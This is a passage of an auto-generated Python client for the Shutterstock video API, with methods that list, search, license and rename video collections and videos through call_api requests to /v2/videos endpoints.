if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/collections/{id}/items', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CollectionItemDataList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_clipbox_list(self, **kwargs): # noqa: E501
"""List video collections # noqa: E501
This endpoint lists your collections of videos and their basic attributes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_clipbox_list(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Page number
:param int per_page: Number of results per page
:return: CollectionDataList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_clipbox_list_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_clipbox_list_with_http_info(**kwargs) # noqa: E501
return data
def get_clipbox_list_with_http_info(self, **kwargs): # noqa: E501
"""List video collections # noqa: E501
This endpoint lists your collections of videos and their basic attributes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_clipbox_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: Page number
:param int per_page: Number of results per page
:return: CollectionDataList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'per_page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_clipbox_list" % key
)
params[key] = val
del params['kwargs']
if 'page' in params and params['page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_clipbox_list`, must be a value greater than or equal to `1`") # noqa: E501
if 'per_page' in params and params['per_page'] > 150: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_clipbox_list`, must be a value less than or equal to `150`") # noqa: E501
if 'per_page' in params and params['per_page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_clipbox_list`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/collections', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CollectionDataList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_similar_videos(self, id, **kwargs): # noqa: E501
"""List similar videos # noqa: E501
This endpoint searches for videos that are similar to a video that you specify. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_similar_videos(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of a video for which similar videos should be returned (required)
:param int page: Page number
:param int per_page: Number of results per page
:param str view: Amount of detail to render in the response
:return: VideoSearchResults
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_similar_videos_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_similar_videos_with_http_info(id, **kwargs) # noqa: E501
return data
def get_similar_videos_with_http_info(self, id, **kwargs): # noqa: E501
"""List similar videos # noqa: E501
This endpoint searches for videos that are similar to a video that you specify. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_similar_videos_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of a video for which similar videos should be returned (required)
:param int page: Page number
:param int per_page: Number of results per page
:param str view: Amount of detail to render in the response
:return: VideoSearchResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'per_page', 'view'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_similar_videos" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_similar_videos`") # noqa: E501
if 'page' in params and params['page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_similar_videos`, must be a value greater than or equal to `1`") # noqa: E501
if 'per_page' in params and params['per_page'] > 500: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_similar_videos`, must be a value less than or equal to `500`") # noqa: E501
if 'per_page' in params and params['per_page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_similar_videos`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
if 'view' in params:
query_params.append(('view', params['view'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basic', 'customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/{id}/similar', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VideoSearchResults', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_updated_videos(self, **kwargs): # noqa: E501
"""List updated videos # noqa: E501
This endpoint lists videos that have been updated in the specified time period to update content management systems (CMS) or digital asset management (DAM) systems. In most cases, use the `interval` parameter to show videos that were updated recently, but you can also use the `start_date` and `end_date` parameters to specify a range of no more than three days. Do not use the `interval` parameter with either `start_date` or `end_date`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_updated_videos(async_req=True)
>>> result = thread.get()
:param async_req bool
:param date start_date: Show videos updated on or after the specified date, in the format YYYY-MM-DD
:param date end_date: Show videos updated before the specified date, in the format YYYY-MM-DD
:param str interval: Show videos updated in the specified time period, where the time period is an interval (like SQL INTERVAL) such as 1 DAY, 6 HOUR, or 30 MINUTE; the default is 1 HOUR, which shows videos that were updated in the hour preceding the request
:param int page: Page number
:param int per_page: Number of results per page
:param str sort: Sort by oldest or newest videos first
:return: UpdatedMediaDataList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_updated_videos_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_updated_videos_with_http_info(**kwargs) # noqa: E501
return data
def get_updated_videos_with_http_info(self, **kwargs): # noqa: E501
"""List updated videos # noqa: E501
This endpoint lists videos that have been updated in the specified time period to update content management systems (CMS) or digital asset management (DAM) systems. In most cases, use the `interval` parameter to show videos that were updated recently, but you can also use the `start_date` and `end_date` parameters to specify a range of no more than three days. Do not use the `interval` parameter with either `start_date` or `end_date`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_updated_videos_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param date start_date: Show videos updated on or after the specified date, in the format YYYY-MM-DD
:param date end_date: Show videos updated before the specified date, in the format YYYY-MM-DD
:param str interval: Show videos updated in the specified time period, where the time period is an interval (like SQL INTERVAL) such as 1 DAY, 6 HOUR, or 30 MINUTE; the default is 1 HOUR, which shows videos that were updated in the hour preceding the request
:param int page: Page number
:param int per_page: Number of results per page
:param str sort: Sort by oldest or newest videos first
:return: UpdatedMediaDataList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_date', 'end_date', 'interval', 'page', 'per_page', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_updated_videos" % key
)
params[key] = val
del params['kwargs']
if 'page' in params and params['page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_updated_videos`, must be a value greater than or equal to `1`") # noqa: E501
if 'per_page' in params and params['per_page'] > 2000: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_updated_videos`, must be a value less than or equal to `2000`") # noqa: E501
if 'per_page' in params and params['per_page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_updated_videos`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'interval' in params:
query_params.append(('interval', params['interval'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basic', 'customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/updated', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpdatedMediaDataList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_video(self, id, **kwargs): # noqa: E501
"""Get details about videos # noqa: E501
This endpoint shows information about a video, including URLs to previews and the sizes that it is available in. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_video(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Video ID (required)
:param str view: Amount of detail to render in the response
:return: Video
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_video_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_video_with_http_info(id, **kwargs) # noqa: E501
return data
def get_video_with_http_info(self, id, **kwargs): # noqa: E501
"""Get details about videos # noqa: E501
This endpoint shows information about a video, including URLs to previews and the sizes that it is available in. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_video_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Video ID (required)
:param str view: Amount of detail to render in the response
:return: Video
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'view'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_video" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_video`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'view' in params:
query_params.append(('view', params['view'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basic', 'customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Video', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_video_categories(self, **kwargs): # noqa: E501
"""List video categories # noqa: E501
This endpoint lists the categories (Shutterstock-assigned genres) that videos can belong to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_video_categories(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: CategoryDataList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_video_categories_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_video_categories_with_http_info(**kwargs) # noqa: E501
return data
def get_video_categories_with_http_info(self, **kwargs): # noqa: E501
"""List video categories # noqa: E501
This endpoint lists the categories (Shutterstock-assigned genres) that videos can belong to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_video_categories_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: CategoryDataList
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_video_categories" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basic', 'customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/categories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CategoryDataList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_video_license_list(self, **kwargs): # noqa: E501
"""List video licenses # noqa: E501
This endpoint lists existing licenses. You can filter the results according to the type of license or the video ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_video_license_list(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str video_id: Show licenses for the specified video ID
:param str license: Show videos that are available with the specified license, such as `standard` or `enhanced`; prepending a `-` sign excludes results from that license
:param int page: Page number
:param int per_page: Number of results per page
:param str sort: Sort by oldest or newest videos first
:return: DownloadHistoryDataList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_video_license_list_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_video_license_list_with_http_info(**kwargs) # noqa: E501
return data
def get_video_license_list_with_http_info(self, **kwargs): # noqa: E501
"""List video licenses # noqa: E501
This endpoint lists existing licenses. You can filter the results according to the type of license or the video ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_video_license_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str video_id: Show licenses for the specified video ID
:param str license: Show videos that are available with the specified license, such as `standard` or `enhanced`; prepending a `-` sign excludes results from that license
:param int page: Page number
:param int per_page: Number of results per page
:param str sort: Sort by oldest or newest videos first
:return: DownloadHistoryDataList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['video_id', 'license', 'page', 'per_page', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_video_license_list" % key
)
params[key] = val
del params['kwargs']
if 'page' in params and params['page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_video_license_list`, must be a value greater than or equal to `1`") # noqa: E501
if 'per_page' in params and params['per_page'] > 200: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_video_license_list`, must be a value less than or equal to `200`") # noqa: E501
if 'per_page' in params and params['per_page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_video_license_list`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'video_id' in params:
query_params.append(('video_id', params['video_id'])) # noqa: E501
if 'license' in params:
query_params.append(('license', params['license'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/licenses', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DownloadHistoryDataList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_video_list(self, id, **kwargs): # noqa: E501
"""List videos # noqa: E501
This endpoint lists information about one or more videos, including the aspect ratio and URLs to previews. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_video_list(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] id: One or more video IDs (required)
:param str view: Amount of detail to render in the response
:return: VideoDataList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_video_list_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_video_list_with_http_info(id, **kwargs) # noqa: E501
return data
def get_video_list_with_http_info(self, id, **kwargs): # noqa: E501
"""List videos # noqa: E501
This endpoint lists information about one or more videos, including the aspect ratio and URLs to previews. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_video_list_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] id: One or more video IDs (required)
:param str view: Amount of detail to render in the response
:return: VideoDataList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'view'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_video_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_video_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'id' in params:
query_params.append(('id', params['id'])) # noqa: E501
collection_formats['id'] = 'multi' # noqa: E501
if 'view' in params:
query_params.append(('view', params['view'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basic', 'customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VideoDataList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def license_videos(self, body, **kwargs): # noqa: E501
"""License videos # noqa: E501
This endpoint gets licenses for one or more videos. You must specify the video IDs in the body parameter and the size and subscription ID either in the query parameter or with each video ID in the body parameter. Values in the body parameter override values in the query parameters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.license_videos(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param LicenseVideoRequest body: List of videos to request licenses for and information about each license transaction; these values override the defaults in the query parameters (required)
:param str subscription_id: The subscription ID to use for licensing
:param str size: The size of the video to license
:param str search_id: The Search ID that led to this licensing event
:return: LicenseVideoResultDataList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.license_videos_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.license_videos_with_http_info(body, **kwargs) # noqa: E501
return data
def license_videos_with_http_info(self, body, **kwargs): # noqa: E501
"""License videos # noqa: E501
This endpoint gets licenses for one or more videos. You must specify the video IDs in the body parameter and the size and subscription ID either in the query parameter or with each video ID in the body parameter. Values in the body parameter override values in the query parameters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.license_videos_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param LicenseVideoRequest body: List of videos to request licenses for and information about each license transaction; these values override the defaults in the query parameters (required)
:param str subscription_id: The subscription ID to use for licensing
:param str size: The size of the video to license
:param str search_id: The Search ID that led to this licensing event
:return: LicenseVideoResultDataList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'subscription_id', 'size', 'search_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method license_videos" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `license_videos`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'subscription_id' in params:
query_params.append(('subscription_id', params['subscription_id'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'search_id' in params:
query_params.append(('search_id', params['search_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/licenses', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseVideoResultDataList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def rename_clipbox(self, id, body, **kwargs): # noqa: E501
"""Rename video collections # noqa: E501
This endpoint sets a new name for a collection. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.rename_clipbox(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the collection to rename (required)
:param CollectionUpdateRequest body: The new name for the collection (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.rename_clipbox_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.rename_clipbox_with_http_info(id, body, **kwargs) # noqa: E501
return data
def rename_clipbox_with_http_info(self, id, body, **kwargs): # noqa: E501
"""Rename video collections # noqa: E501
This endpoint sets a new name for a collection. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.rename_clipbox_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the collection to rename (required)
:param CollectionUpdateRequest body: The new name for the collection (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method rename_clipbox" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `rename_clipbox`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `rename_clipbox`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/collections/{id}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_videos(self, **kwargs): # noqa: E501
"""Search for videos # noqa: E501
This endpoint searches for videos. If you specify more than one search parameter, the API uses an AND condition. Array parameters can be specified multiple times; in this case, the API uses an AND or an OR condition with those values, depending on the parameter. You can also filter search terms out in the `query` parameter by prefixing the term with NOT. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_videos(async_req=True)
>>> result = thread.get()
:param async_req bool
:param date added_date: Show videos added on the specified date, in the format YYYY-MM-DD
:param date added_date_start: Show videos added on or after the specified date, in the format YYYY-MM-DD
:param date added_date_end: Show videos added before the specified date, in the format YYYY-MM-DD
:param str aspect_ratio: Show videos with the specified aspect ratio
:param str category: Show videos with the specified Shutterstock-defined category; specify a category name or ID
:param list[str] contributor: Show videos with the specified artist names or IDs
:param int duration: (Deprecated; use duration_from and duration_to instead) Show videos with the specified duration (seconds)
:param int duration_from: Show videos with the specified duration or longer (seconds)
:param int duration_to: Show videos with the specified duration or shorter (seconds)
:param float fps: (Deprecated; use fps_from and fps_to instead) Show videos with the specified frames per second
:param float fps_from: Show videos with the specified frames per second or more
:param float fps_to: Show videos with the specified frames per second or fewer
:param str language: Set query and result language (uses Accept-Language header if not set)
:param list[str] license: Show only videos with the specified license or licenses
:param list[str] model: Show videos with each of the specified models
:param int page: Page number
:param int per_page: Number of results per page
:param str people_age: Show videos that feature people of the specified age range
:param str people_ethnicity: Show videos with people of the specified ethnicity
:param str people_gender: Show videos with people with the specified gender
:param int people_number: Show videos with the specified number of people
:param bool people_model_released: Show only videos of people with a signed model release
:param str query: One or more search terms separated by spaces; you can use NOT to filter out videos that match a term
:param str resolution: Show videos with the specified resolution
:param bool safe: Enable or disable safe search
:param str sort: Sort by one of these categories
:param str view: Amount of detail to render in the response
:return: VideoSearchResults
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_videos_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.search_videos_with_http_info(**kwargs) # noqa: E501
return data
def search_videos_with_http_info(self, **kwargs): # noqa: E501
"""Search for videos # noqa: E501
This endpoint searches for videos. If you specify more than one search parameter, the API uses an AND condition. Array parameters can be specified multiple times; in this case, the API uses an AND or an OR condition with those values, depending on the parameter. You can also filter search terms out in the `query` parameter by prefixing the term with NOT. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_videos_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param date added_date: Show videos added on the specified date, in the format YYYY-MM-DD
:param date added_date_start: Show videos added on or after the specified date, in the format YYYY-MM-DD
:param date added_date_end: Show videos added before the specified date, in the format YYYY-MM-DD
:param str aspect_ratio: Show videos with the specified aspect ratio
:param str category: Show videos with the specified Shutterstock-defined category; specify a category name or ID
:param list[str] contributor: Show videos with the specified artist names or IDs
:param int duration: (Deprecated; use duration_from and duration_to instead) Show videos with the specified duration (seconds)
:param int duration_from: Show videos with the specified duration or longer (seconds)
:param int duration_to: Show videos with the specified duration or shorter (seconds)
